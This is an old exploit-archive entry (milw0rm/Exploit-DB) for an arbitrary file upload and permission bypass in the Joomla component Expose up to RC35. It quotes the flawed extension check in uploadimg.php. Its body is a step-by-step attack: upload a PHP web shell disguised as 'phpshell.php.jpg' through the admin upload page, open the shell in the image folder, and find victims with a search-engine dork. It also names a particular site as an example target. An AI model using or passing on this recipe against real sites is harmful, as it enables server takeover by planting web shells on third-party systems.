Joomla! Component Expose RC35 - Arbitrary File Upload

EDB-ID:

4194




Platform:

PHP

Date:

2007-07-18


   				   
                   		   HHHHHHH HHHHHH HH      HHHHHHHH HHHHHH HHHHHHHH IHHI HH    HH HHHHHHHH
				   HH   HH HH  HH HH      HHHHHHHH HH       IHHI    HH  HHH   HH HHHHHHHH
				   HH   HH HH  HH HH      HH       HH        HH     HH  HHHH  HH HH
				   HHHHHHH HHHHHH HH      HHHHHHH  HHHHHH    HH     HH  HH HH HH HHHHHHHH
				   HH	   HH  HH HH      HH           HH    HH     HH  HH  HHHH HH
				   HH	   HH  HH HH      HHHHHHHH     HH    HH     HH  HH   HHH HHHHHHHH
				   HH	   HH  HH HHHHHHH HHHHHHHH HHHHHH    HH    IHHI HH    HH HHHHHHHH

================================================================================================================
++ Joomla Component Expose <= RC35 Remote Permission Bypass/Arbitrary File Upload Vulnerability		      ++
++ http://joomlacode.org/gf/download/frsrelease/726/10814/com_expose_small_rc4.zip			      ++
----------------------------------------------------------------------------------------------------------------
++ in : /com_expose/uploadimg.php 									      ++
++ =>  $target_path = "../../../components/com_expose/expose/img/";					      ++
++ if((strcasecmp(substr($userfile_name,-4),'.jpg'))){ echo "<script>alert('The file must be jpg');</script>";++
++ File Upload : <?php echo $target_path; ?>                                                                  ++
++ Attacker Got Permission Bypass and upload files                                                            ++
----------------------------------------------------------------------------------------------------------------
++ Arbitrary File Upload										      ++
++ use this link to upload your phpshell [ phpshell.php.jpg ]                                                 ++
++ http://site.com/administrator/components/com_expose/uploadimg.php                                          ++
++ You wil have shell file in this page                                                                       ++
++ http://site.com/components/com_expose/expose/img/                                                          ++
++ Example : http://ayazshah.com/                                                                             ++
++ Dork : "index.php?option=com_expose"                                                                       ++
----------------------------------------------------------------------------------------------------------------
++ Cold z3ro                                                                                                  ++
++ http://hackteach.org                                                                                       ++
----------------------------------------------------------------------------------------------------------------
++ Greets : Hackteach Members , Xp10.Com 								      ++
++ Greets 2 arab Coders : ValentinoLove,Gold M,Sniper-sa,dOCnOK,Hammam,Pal-booter Coders speciale Mr.jerusalem++
================================================================================================================


				  HH  HH HHHHHH HHHHHH HH   HH   HHHHHHHH HHHHHHHH HHHHHHH HHHHHH HH  HH
			  	  HH  HH HH  HH HHHHH  HH  HH	   IHHI   HHHHHHH  HH   HH HHHHH  HH  HH
				  HH  HH HH  HH HH     HH HH        HH    HH	   HH   HH HH     HH  HH
				  HHHHHH HHHHHH HH     HHHH  HHHHH  HH    HHHHHHH  HH   HH HH     HHHHHH
				  HH  HH HH  HH HH     HH HH	    HH    HH       HHHHHHH HH     HH  HH
				  HH  HH HH  HH HHHHH  HH  HH       HH    HHHHHHHH HH   HH HHHHH  HH  HH
				  HH  HH HH  HH HHHHHH HH   HH      HH    HHHHHHHH HH   HH HHHHHH HH  HH

# milw0rm.com [2007-07-18]